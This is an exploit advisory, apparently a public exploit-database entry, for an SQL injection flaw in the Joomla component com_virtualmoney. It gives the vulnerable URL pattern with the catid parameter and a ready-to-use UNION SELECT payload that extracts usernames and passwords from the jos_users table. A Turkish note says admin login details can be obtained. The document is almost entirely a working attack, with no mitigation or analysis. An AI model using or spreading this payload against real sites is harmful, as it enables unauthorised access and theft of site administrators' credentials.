<------------------- header data start ------------------- > ############################################################# Joomla Component virtualmoney SQL Injection Vulnerability ############################################################# # Author : Fl0riX ~ Bug Researchers # Name : Joomla com_virtualmoney # info : http://extensions.joomla.org/extensions/e-commerce/paid-membership-a-subscriptions/17714 # Bug Type : SQL injection # Infection : Admin Login Bilgileri Alinabilir. # Example : [+] www.site/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT] ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > EXPLOIT : 1+and+1=0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+jos_users-- < -- bug code end of -- >